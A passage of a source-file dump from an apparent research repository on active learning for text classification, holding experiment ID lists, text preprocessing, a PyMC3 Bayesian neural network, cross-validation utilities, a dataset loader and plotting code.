\"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62ac4dc07420eb1f9cbcf139\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62b74a8885f0fadccffe04d4\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62b7189e85f0fadccffe04d3\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a408e3e3d593c4739b804e\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a375e2e3d593c4739b804d\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ae27e0e1df8d304af2a977\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62ad31a4e1df8d304af2a976\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"6246d66149d95ab971503607\", \"Fake news detection\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6246de6f49d95ab971503608\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6246e69949d95ab971503609\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"6246f23049d95ab97150360b\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6246f7f049d95ab97150360c\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6246ec6449d95ab97150360a\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625d20dfcc6a567f475264e0\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625d2dc7cc6a567f475264e1\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625d3edccc6a567f475264e3\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625d477acc6a567f475264e4\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625d3651cc6a567f475264e2\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6253209b0d4215a7e77b6037\", \"Fake news detection\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"625337300d4215a7e77b6038\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"62534deb0d4215a7e77b6039\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"62536fe50d4215a7e77b603b\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"625380cc0d4215a7e77b603c\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"62535f000d4215a7e77b603a\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625d2a4747ea60bfee10a84d\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625d404947ea60bfee10a84e\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625d5cdf47ea60bfee10a850\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625d6a9847ea60bfee10a851\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625d4f1147ea60bfee10a84f\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624748f500157501d9f0f291\", \"Fake news detection\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624765e100157501d9f0f292\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624782ba00157501d9f0f293\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"6247afd200157501d9f0f295\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6247c67e00157501d9f0f296\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6247992f00157501d9f0f294\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"6249fc7d12e53fdf9a7ca053\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624baa19437c8c4caa414612\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624f50bf437c8c4caa414614\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"6250e2c5437c8c4caa414615\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d5a2d437c8c4caa414613\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"random\"],\n [\"625d461a6881ae9fd6f26bcc\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625d6f446881ae9fd6f26bcd\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625dad256881ae9fd6f26bcf\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625dd4a96881ae9fd6f26bd0\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"625d88426881ae9fd6f26bce\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6254b3890d90e3d52f546234\", \"Fake news detection\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"62550b880d90e3d52f546235\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"625571360d90e3d52f546236\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"62560eb20d90e3d52f546238\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625655790d90e3d52f546239\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6255c6c60d90e3d52f546237\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625c22dc7ce437e78a7a2f66\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625c6a6a7ce437e78a7a2f67\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625cc7347ce437e78a7a2f69\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625cf4a27ce437e78a7a2f6a\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625c9ad97ce437e78a7a2f68\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62b05d78dfc4f444714b908c\", \"Fake news detection\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62b041d1dfc4f444714b908b\", \"Fake news detection\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8c06a4d78e3e756856b70\", \"Fake news detection\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a87d8d4d78e3e756856b6f\", \"Fake news detection\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a687334412584231d1dfff\", \"Fake news detection\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a605bc4412584231d1dffe\", \"Fake news detection\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ac07e25de9c35d5d1e9794\", \"Fake news detection\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aad2e65de9c35d5d1e9793\", \"Fake news detection\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"6256af3008ad855bbecc3c09\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6256c3d208ad855bbecc3c0a\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6256d9fc08ad855bbecc3c0b\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"6256e9fc08ad855bbecc3c0d\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6256f21508ad855bbecc3c0e\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6256e21808ad855bbecc3c0c\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"624d511ed7293ac5a8902085\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"624d6316d7293ac5a8902086\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"624d66bbd7293ac5a8902088\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"624d688dd7293ac5a8902089\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"624d64e9d7293ac5a8902087\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6256dce5f692a6acb3e2fbab\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"62576c60f692a6acb3e2fbac\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"625798baf692a6acb3e2fbad\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6257bbccf692a6acb3e2fbaf\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"625e763b5b32a8c1e69248ae\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6257aa29f692a6acb3e2fbae\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625dbb84091e4e88de538de2\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625de514091e4e88de538de3\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625e0282091e4e88de538de5\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625e112d091e4e88de538de6\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625df3c0091e4e88de538de4\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624ec21df75a7d0e7ea688f2\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624f26a2f75a7d0e7ea688f3\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624f7eeef75a7d0e7ea688f4\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"624fcc18f75a7d0e7ea688f6\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"624ff437f75a7d0e7ea688f7\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"624fa573f75a7d0e7ea688f5\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"625022c9a32053a44087a896\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"6250570aa32053a44087a897\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"6250650fa32053a44087a899\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"62506ca5a32053a44087a89a\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"62505d7da32053a44087a898\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"625221b75e616ca40bb9658e\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"6252c9ad5e616ca40bb9658f\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"62538ade5e616ca40bb96590\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"625437325e616ca40bb96592\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"6254948a5e616ca40bb96593\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6253da4c5e616ca40bb96591\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625db7c365e41edab31635bc\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625e4d4865e41edab31635bd\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625ed86f65e41edab31635bf\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625f1d3965e41edab31635c0\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625e903e65e41edab31635be\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62acb88204e7c165291ac8da\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62ac981804e7c165291ac8d9\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a7710ebd0a8741a56771fe\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a7334ebd0a8741a56771fd\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a40a7560198063937b96ff\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a376fb60198063937b96fe\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ae28e2657ef787c773fe2f\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62ad3275657ef787c773fe2e\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n]\n"
},
{
"alpha_fraction": 0.6653322577476501,
"alphanum_fraction": 0.6677342057228088,
"avg_line_length": 29.463415145874023,
"blob_id": "32128be355ffc81943f6401f4d1de8870bc73ff9",
"content_id": "8b31cb29d68ae27abfe87df50a7079b25494daf4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1249,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 41,
"path": "/Peony_project/Peony_box/src/transformators/common.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport nltk\n\nfrom typing import List, Any\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import TweetTokenizer\n\n\ndef create_hash(hash_args: List[Any]) -> str:\n sha = hashlib.sha256()\n sha.update(\" \".join(hash_args).encode())\n return sha.hexdigest()\n\n\ndef stop_words_filter(tokens: List[str]) -> List[str]:\n stopset = set(stopwords.words(\"english\"))\n return [token for token in tokens if token not in stopset]\n\n\ndef lemmatizer(tokens: List[str]):\n\n lemmatizer = WordNetLemmatizer()\n lemmatized_text: List[str] = []\n\n for token in tokens:\n if lemmatizer.lemmatize(token, pos=\"n\") == token:\n if lemmatizer.lemmatize(token, pos=\"v\") == token:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"a\"))\n else:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"v\"))\n else:\n lemmatized_text.append(lemmatizer.lemmatize(token, pos=\"n\"))\n\n return lemmatized_text\n\n\ndef tokenizer(text: str) -> List[str]:\n tokenizer = TweetTokenizer()\n tokens = tokenizer.tokenize(text if isinstance(text, str) else \" \")\n return [token.lower() for token in tokens if token.isalpha() == True]\n"
},
{
"alpha_fraction": 0.580047607421875,
"alphanum_fraction": 0.5924847722053528,
"avg_line_length": 33.99074172973633,
"blob_id": "e37a3110793f14cec72dd081584d3392931909df",
"content_id": "9bad2edbb983580e8918ea7acc144e6c39feab7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3779,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 108,
"path": "/Peony_project/Peony_box/src/peony_adjusted_models/pymc3_nn.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import theano\nimport pymc3 as pm\nimport theano.tensor as T\nimport sklearn\nimport numpy as np\n\nfrom warnings import filterwarnings\nfrom typing import Optional, Tuple, List, Callable\n\ntheano.config.gcc.cxxflags = \"-Wno-c++11-narrowing\"\nfilterwarnings(\"ignore\")\n\nEPOCHS = 60000\nfloatX = theano.config.floatX\n\n\nclass PeonyPymc3NN:\n def __init__(self, hidden_size: int, num_classes: int):\n self.n_hidden = hidden_size\n self.num_classes = num_classes\n self.num_epochs = EPOCHS\n self.initialized = False\n\n def fit(self, instances: np.ndarray, labels: np.ndarray) -> Optional[List[str]]:\n\n self.model = self._construct_nn(instances, labels)\n with self.model:\n inference = pm.ADVI()\n self.approx = pm.fit(n=EPOCHS, method=inference)\n\n self.sample_proba = self._sample_probability(instances)\n\n return None\n\n def predict(self, instances: np.ndarray) -> List[np.ndarray]:\n\n return self.sample_proba(pm.floatX(np.transpose(instances, axes=None)).T, 500)\n\n def _sample_probability(\n self, ann_input: np.ndarray\n ) -> Callable[[np.ndarray, int], theano.function]:\n # create symbolic input\n x = T.matrix(\"X\")\n # symbolic number of samples is supported, we build vectorized posterior on the fly\n n = T.iscalar(\"n\")\n # Do not forget test_values or set theano.config.compute_test_value = 'off'\n x.tag.test_value = np.empty_like(ann_input[:10])\n n.tag.test_value = 100\n _sample_proba = self.approx.sample_node(\n self.model.out.distribution.p,\n size=n,\n more_replacements={self.model[\"ann_input\"]: x},\n )\n # It is time to compile the function\n # No updates are needed for Approximation random generator\n # Efficient vectorized form of sampling is used\n return theano.function([x, n], _sample_proba)\n\n def _construct_nn(self, ann_input: np.ndarray, ann_output: np.ndarray) -> pm.Model:\n\n input_size = ann_input.shape[1]\n total_size = ann_output.shape[0]\n\n # Initialize random weights between each layer\n init_1 = np.random.randn(input_size, self.n_hidden).astype(floatX)\n init_2 = np.random.randn(self.n_hidden, self.n_hidden).astype(floatX)\n init_out = np.random.randn(self.n_hidden).astype(floatX)\n\n with pm.Model() as neural_network:\n\n ann_input = pm.Data(\"ann_input\", ann_input.astype(floatX))\n ann_output = pm.Data(\"ann_output\", ann_output.astype(floatX))\n\n # Weights from input to hidden layer\n weights_in_1 = pm.Normal(\n \"w_in_1\", 0, sigma=1, shape=(input_size, self.n_hidden), testval=init_1\n )\n\n # Weights from 1st to 2nd layer\n weights_1_2 = pm.Normal(\n \"w_1_2\",\n 0,\n sigma=1,\n shape=(self.n_hidden, self.n_hidden),\n testval=init_2,\n )\n\n # Weights from hidden layer to output\n weights_2_out = pm.Normal(\n \"w_2_out\", 0, sigma=1, shape=(self.n_hidden,), testval=init_out\n )\n\n # Build neural-network using tanh activation function\n act_1 = pm.math.tanh(pm.math.dot(ann_input, weights_in_1))\n act_2 = pm.math.tanh(pm.math.dot(act_1, weights_1_2))\n act_out = pm.math.sigmoid(pm.math.dot(act_2, weights_2_out))\n\n # Binary classification -> Bernoulli likelihood\n out = pm.Bernoulli(\n \"out\",\n act_out,\n observed=ann_output,\n total_size=total_size, # IMPORTANT for minibatches\n )\n return neural_network\n\n def reset(self) -> None:\n pass\n"
},
{
"alpha_fraction": 0.6051779985427856,
"alphanum_fraction": 0.6051779985427856,
"avg_line_length": 29.899999618530273,
"blob_id": "9d8fbdd01d91d9afd5d0012e36b007fab79f314b",
"content_id": "30bbec14c13c4ec2abe813edec0cfd0919a7cbee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 10,
"path": "/Peony_project/dump_mongo_2_json.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from bson.json_util import dumps\nfrom PeonyPackage.PeonyDb import MongoDb\n\nif __name__ == '__main__':\n api = MongoDb()\n cursor = api.get_model_results({})\n with open('collection.json', 'w') as file:\n for document in cursor:\n file.write(dumps(document))\n file.write('\\n')\n"
},
{
"alpha_fraction": 0.6509256958961487,
"alphanum_fraction": 0.6579018235206604,
"avg_line_length": 36.27000045776367,
"blob_id": "7e39295b0dd31c5b35525c47328d4e12bd7e45e4",
"content_id": "9b6648b94c6c7119c45cbbc7f54df084ae83566d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3727,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 100,
"path": "/Peony_project/Peony_box/src/utils.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\n\nfrom tqdm import tqdm\nfrom typing import Any, List, Dict, Callable, Union, Tuple\nfrom sklearn.model_selection import KFold\nfrom sklearn.utils import shuffle\nfrom sklearn.metrics import auc, roc_curve\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\n\n\ndef transform_label_to_binary(\n true_vs_predicted: List[Dict[str, np.ndarray]]\n) -> Tuple[List[Dict[str, np.ndarray]], List[int]]:\n\n unique_values = np.unique(true_vs_predicted[0][\"true\"])\n if len(unique_values) > 2:\n raise Exception(\"This is not binary classification\")\n if len(unique_values) != 2:\n mapped_to_0 = unique_values[0]\n print(f\"Label {mapped_to_0} in mapped to 0, another label is mapped to 1\")\n else:\n mapped_to_0 = unique_values[0]\n mapped_to_1 = unique_values[1]\n print(f\"Label {mapped_to_0} in mapped to 0, label {mapped_to_1} in mapped to 1\")\n for record in true_vs_predicted:\n for index in range(len(record[\"true\"])):\n record[\"true\"][index] = 0 if record[\"true\"][index] == mapped_to_0 else 1\n record[\"predicted\"][index] = 0 if record[\"predicted\"][index] == mapped_to_0 else 1\n\n return (true_vs_predicted, unique_values)\n\n\ndef auc_metrics(true_vs_predicted: List[Dict[str, np.ndarray]], label_to_binary: bool = True) -> list:\n\n if label_to_binary:\n true_vs_predicted, unique_values = transform_label_to_binary(true_vs_predicted)\n\n aucs = []\n for index, record in enumerate(true_vs_predicted):\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = roc_curve(record[\"true\"], record[\"predicted\"])\n roc_auc = auc(fpr, tpr)\n aucs.append(roc_auc)\n return aucs\n\n\ndef k_fold_corss_validation(\n model: Any,\n transformator: Transformator,\n validation_instances: List[Dict[str, Any]],\n validation_labels: List[Any],\n splits: int,\n transform_label_to_binary: bool = False,\n) -> List[Dict[str, np.ndarray]]:\n\n model_output: list = []\n\n print(\"transforming instances for k fold cross validation...\")\n validation_instances = transformator.transform_instances(validation_instances)\n print(\"transforming labels for k fold cross validation...\")\n validation_labels = transformator.transform_labels(validation_labels)\n\n validation_instances, validation_labels = shuffle(validation_instances, validation_labels, random_state=0)\n\n if transform_label_to_binary:\n unique_values = np.unique(validation_labels)\n if unique_values is not None:\n validation_labels = np.asarray([0 if x == unique_values[0] else 1 for x in validation_labels])\n\n true_vs_predicted: List[Dict[str, np.ndarray]] = []\n kf = KFold(n_splits=splits)\n kf.get_n_splits(validation_instances)\n\n print(\"k fold cross validation...\")\n splitted = list(kf.split(validation_instances))\n for train_index, test_index in tqdm(splitted):\n X_train, X_test = (\n [validation_instances[i] for i in train_index],\n [validation_instances[i] for i in test_index],\n )\n y_train, y_test = (\n [validation_labels[i] for i in train_index],\n [validation_labels[i] for i in test_index],\n )\n model.training_dataset = {}\n\n output = model.fit(X_train, y_train, transformation_needed=False)\n if output:\n model_output.extend(output)\n\n y_predicted = model.predict(X_test, transformation_needed=False)\n\n true_vs_predicted.append({\"true\": y_test, \"predicted\": np.round(y_predicted)})\n model.reset()\n\n if model_output != []:\n print(\"\\n\".join(\" , \".join(output) for output in model_output))\n\n return true_vs_predicted\n"
},
{
"alpha_fraction": 0.6221547722816467,
"alphanum_fraction": 0.6236722469329834,
"avg_line_length": 31.14634132385254,
"blob_id": "95f6fd32c32afbf39d7b30ae39f757de0ce120bf",
"content_id": "a4f71c841f2a23d3b8fb61321f839dc6dc85dac2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1318,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 41,
"path": "/Peony_project/Peony_database/src/datasets/HuffPost_news_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"HuffPost_dataset\"\nCOLLECTION_ID = 1\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 1\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"title\"], record[\"metadata\"][\"short_description\"]]\n )\n transormed_record[\"record\"][\"snippet\"] = record[\"metadata\"][\"short_description\"]\n transormed_record[\"record\"][\"text\"] = {\n \"title\": record[\"title\"],\n \"body\": record[\"body\"],\n }\n transormed_record[\"record\"][\"label\"] = record[\"metadata\"][\"category\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"authors\": record[\"metadata\"][\"authors\"],\n \"language\": record[\"language\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n data: list = []\n for json_doc in tqdm(path.iterdir()):\n if json_doc.stem != \".DS_Store\":\n with open(json_doc, \"r\") as f:\n lines = f.readlines()\n data.extend(*[json.loads(line) for line in lines])\n return data\n"
},
{
"alpha_fraction": 0.5008240938186646,
"alphanum_fraction": 0.5313162207603455,
"avg_line_length": 28.908451080322266,
"blob_id": "87f7426705c83cf72df4ae061abac255db924d9b",
"content_id": "d498c4d6cf4824186421b223816d33328ea761a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8494,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 284,
"path": "/Peony_project/Peony_visualization/src/active_learning_for_text_classification/plots_for_article.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib\nimport numpy as np\n\nfrom PeonyPackage.PeonyDb import MongoDb\n\n\ndef visualize_auc_evolutions(\n ax,\n markevery,\n auc_seq_passive_1,\n auc_seq_passive_2,\n auc_seq_active_1,\n auc_seq_active_2,\n model_1,\n model_2,\n title,\n):\n\n auc_1_passive_mean = np.mean(auc_seq_passive_1, axis=0)\n auc_1_passive_std = np.std(auc_seq_passive_1, axis=0)\n\n auc_2_passive_mean = np.mean(auc_seq_passive_2, axis=0)\n auc_2_passive_std = np.std(auc_seq_passive_2, axis=0)\n\n auc_1_active_mean = np.mean(auc_seq_active_1, axis=0)\n auc_1_active_std = np.std(auc_seq_active_1, axis=0)\n\n auc_2_active_mean = np.mean(auc_seq_active_2, axis=0)\n auc_2_active_std = np.std(auc_seq_active_2, axis=0)\n\n ax.grid(alpha=0.2)\n ax.plot(\n [i for i in range(200)],\n auc_1_passive_mean,\n linestyle=\"--\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Random Selection {model_1} mean\",\n alpha=0.4,\n )\n ax.plot(auc_1_passive_mean + auc_1_passive_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n ax.plot(auc_1_passive_mean - auc_1_passive_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_2_passive_mean,\n linestyle=\"--\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Random Selection {model_2} mean\",\n alpha=0.4,\n )\n ax.plot(auc_2_passive_mean + auc_2_passive_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n ax.plot(auc_2_passive_mean - auc_2_passive_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_1_active_mean,\n linestyle=\"-\",\n marker=\"+\",\n markevery=markevery,\n color=\"b\",\n lw=1,\n label=f\"Active Learning {model_1} mean\",\n )\n ax.plot(auc_1_active_mean + auc_1_active_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n ax.plot(auc_1_active_mean - auc_1_active_std, linestyle=\"-\", color=\"b\", alpha=0.1)\n\n ax.plot(\n [i for i in range(200)],\n auc_2_active_mean,\n linestyle=\"-\",\n marker=\"*\",\n markevery=markevery,\n color=\"g\",\n lw=1,\n label=f\"Active Learning {model_2} mean\",\n )\n ax.plot(auc_2_active_mean + auc_2_active_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n ax.plot(auc_2_active_mean - auc_2_active_std, linestyle=\"-\", color=\"g\", alpha=0.1)\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_1_passive_mean + auc_1_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_1_passive_mean - auc_1_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"b\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_2_passive_mean + auc_2_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n (auc_2_passive_mean - auc_2_passive_std).reshape(\n len(auc_2_active_mean),\n ),\n alpha=0.05,\n color=\"g\",\n )\n\n ax.fill_between(\n [i for i in range(200)],\n (auc_1_active_mean 